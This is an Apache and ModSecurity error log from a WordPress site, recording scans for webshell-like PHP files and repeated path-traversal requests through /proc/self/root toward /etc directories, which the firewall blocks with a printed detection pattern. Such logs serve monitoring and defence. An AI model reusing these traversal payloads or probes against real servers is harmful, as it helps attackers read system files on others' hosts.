"bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrj7uyqAr6etmhZHNrxhAAAAEU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 14:42:07.766476 2026] [autoindex:error] [pid 17887:tid 140411733534464] [client 20.63.210.169:5191] AH01276: Cannot serve directory /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html) found, and server-generated directory index forbidden by Options directive
[Wed Mar 18 14:42:09.727420 2026] [autoindex:error] [pid 17887:tid 140411599251200] [client 20.63.210.169:5191] AH01276: Cannot serve directory /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes/js/plupload/: No matching DirectoryIndex (index.php,index.html) found, and server-generated directory index forbidden by Options directive
[Wed Mar 18 14:42:12.291101 2026] [access_compat:error] [pid 17887:tid 140411716749056] [client 20.63.210.169:5191] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/222.php
[Wed Mar 18 14:42:12.566280 2026] [access_compat:error] [pid 17887:tid 140411548894976] [client 20.63.210.169:5191] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/abcd.php
[Wed Mar 18 14:42:12.843116 2026] [access_compat:error] [pid 17887:tid 140411607643904] [client 20.63.210.169:5191] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/class-t.api.php
[Wed Mar 18 14:42:13.122203 2026] [access_compat:error] [pid 17887:tid 140411624429312] [client 20.63.210.169:5191] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/classwithtostring.php
[Wed Mar 18 14:42:13.398498 2026] [access_compat:error] [pid 17887:tid 140411557287680] [client 20.63.210.169:5191] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/file.php
[Wed Mar 18 14:42:13.673050 2026] [access_compat:error] [pid 17887:tid 140411641214720] [client 20.63.210.169:5191] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/info.php
[Wed Mar 18 14:42:13.956555 2026] [autoindex:error] [pid 17887:tid 140411674785536] [client 20.63.210.169:5191] AH01276: Cannot serve directory /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/css/colors/coffee/: No matching DirectoryIndex (index.php,index.html) found, and server-generated directory index forbidden by Options directive
[Wed Mar 18 14:42:14.231856 2026] [autoindex:error] [pid 17887:tid 140411574073088] [client 20.63.210.169:5191] AH01276: Cannot serve directory /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/js/widgets/: No matching DirectoryIndex (index.php,index.html) found, and server-generated directory index forbidden by Options directive
[Wed Mar 18 14:42:14.524413 2026] [autoindex:error] [pid 17887:tid 140411565680384] [client 20.63.210.169:5191] AH01276: Cannot serve directory /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-content/languages/: No matching DirectoryIndex (index.php,index.html) found, and server-generated directory index forbidden by Options directive
[Wed Mar 18 14:42:14.799511 2026] [autoindex:error] [pid 17887:tid 140411691570944] [client 20.63.210.169:5191] AH01276: Cannot serve directory /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-content/languages/plugins/: No matching DirectoryIndex (index.php,index.html) found, and server-generated directory index forbidden by Options directive
[Wed Mar 18 14:42:15.075340 2026] [autoindex:error] [pid 17887:tid 140411632822016] [client 20.63.210.169:5191] AH01276: Cannot serve directory /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-content/themes/twentytwentyfour/: No matching DirectoryIndex (index.php,index.html) found, and server-generated directory index forbidden by Options directive
[Wed Mar 18 14:42:15.353583 2026] [autoindex:error] [pid 17887:tid 140411582465792] [client 20.63.210.169:5191] AH01276: Cannot serve directory /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-content/upgrade/: No matching DirectoryIndex (index.php,index.html) found, and server-generated directory index forbidden by Options directive
[Wed Mar 18 14:42:15.628978 2026] [autoindex:error] [pid 17887:tid 140411699963648] [client 20.63.210.169:5191] AH01276: Cannot serve directory /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html) found, and server-generated directory index forbidden by Options directive
[Wed Mar 18 14:42:15.904313 2026] [access_compat:error] [pid 17887:tid 140411725141760] [client 20.63.210.169:5191] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-good.php
[Wed Mar 18 14:42:16.180482 2026] [autoindex:error] [pid 17887:tid 140411540502272] [client 20.63.210.169:5191] AH01276: Cannot serve directory /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes/js/jquery/: No matching DirectoryIndex (index.php,index.html) found, and server-generated directory index forbidden by Options directive
[Wed Mar 18 14:42:16.460658 2026] [autoindex:error] [pid 17887:tid 140411658000128] [client 20.63.210.169:5191] AH01276: Cannot serve directory /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes/js/jquery/ui/: No matching DirectoryIndex (index.php,index.html) found, and server-generated directory index forbidden by Options directive
[Wed Mar 18 14:42:16.735920 2026] [autoindex:error] [pid 17887:tid 140411616036608] [client 20.63.210.169:5191] AH01276: Cannot serve directory /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes/js/tinymce/themes/: No matching DirectoryIndex (index.php,index.html) found, and server-generated directory index forbidden by Options directive
[Wed Mar 18 14:42:17.011048 2026] [autoindex:error] [pid 17887:tid 140411733534464] [client 20.63.210.169:5191] AH01276: Cannot serve directory /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes/rest-api/: No matching DirectoryIndex (index.php,index.html) found, and server-generated directory index forbidden by Options directive
[Wed Mar 18 14:42:18.823202 2026] [autoindex:error] [pid 17887:tid 140411666392832] [client 20.63.210.169:5191] AH01276: Cannot serve directory /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes/fonts/: No matching DirectoryIndex (index.php,index.html) found, and server-generated directory index forbidden by Options directive
[Wed Mar 18 14:42:20.119373 2026] [:error] [pid 15826:tid 140411725141760] [client 74.7.241.31:56168] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrj_OoXxyEfFpUF8f-bjAAAAUI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 14:42:20.610586 2026] [cgid:error] [pid 17887:tid 140411716749056] [client 20.63.210.169:5191] AH01265: attempt to invoke directory as script: /var/www/cgi-bin/
[Wed Mar 18 14:42:46.923482 2026] [:error] [pid 15826:tid 140411607643904] [client 74.7.243.128:35272] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrkFuoXxyEfFpUF8f-bswAAAVA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:43:34.762785 2026] [:error] [pid 11816:tid 140411683178240] [client 74.7.241.31:35112] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrkRuw_le52K8_3pV0G7gAAAgc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 14:43:36.254951 2026] [:error] [pid 14269:tid 140411699963648] [client 74.7.241.31:46288] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrkSAbLMZ6AikZjR9XpdgAAAAU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:43:44.039089 2026] [:error] [pid 26799:tid 140411624429312] [client 74.7.241.31:35722] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrkUNa6ubjKNq_cu4bIEgAAA04"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 14:43:49.875721 2026] [:error] [pid 15051:tid 140411716749056] [client 74.7.241.31:35724] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrkVSmAPhZkrhU8w4mWmwAAAIM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:44:04.391474 2026] [:error] [pid 17653:tid 140411674785536] [client 74.7.241.31:35520] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrkZMdf6f5d65gmYZT-uQAAAsg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:44:26.683682 2026] [:error] [pid 14269:tid 140411599251200] [client 74.7.243.128:54862] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrkegbLMZ6AikZjR9Xp6gAAABE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 14:44:27.396768 2026] [:error] [pid 11816:tid 140411733534464] [client 74.7.244.43:45668] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abrke-w_le52K8_3pV0HCAAAAgE"]
[Wed Mar 18 14:44:32.563147 2026] [:error] [pid 15826:tid 140411699963648] [client 74.7.228.61:54182] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abrkgOoXxyEfFpUF8f-ceAAAAUU"]
[Wed Mar 18 14:44:45.043264 2026] [:error] [pid 15826:tid 140411641214720] [client 74.7.241.31:56216] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrkjeoXxyEfFpUF8f-ckgAAAUw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:45:16.925014 2026] [:error] [pid 29882:tid 140411557287680] [client 74.7.241.31:42468] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrkrEzinOy1jxa1j4dE1AAAARY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 14:46:12.865127 2026] [:error] [pid 17887:tid 140411691570944] [client 74.7.243.128:43780] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrk5AkwaGbbGflqUZA81AAAAMY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 14:46:16.976391 2026] [:error] [pid 17887:tid 140411683178240] [client 74.7.241.31:59580] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/var/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrk6AkwaGbbGflqUZA82QAAAMc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/var/run/initramfs/state/etc
[Wed Mar 18 14:46:18.715049 2026] [:error] [pid 29882:tid 140411565680384] [client 74.7.243.128:34318] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrk6kzinOy1jxa1j4dFDAAAARU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 14:46:23.911452 2026] [:error] [pid 29882:tid 140411582465792] [client 74.7.241.31:33166] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrk70zinOy1jxa1j4dFFgAAARM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 14:46:56.238551 2026] [:error] [pid 15826:tid 140411590858496] [client 74.7.243.128:49696] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrlEOoXxyEfFpUF8f-dGQAAAVI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 14:47:11.547084 2026] [:error] [pid 29882:tid 140411616036608] [client 74.7.243.128:47688] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrlH0zinOy1jxa1j4dFQAAAAQ8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
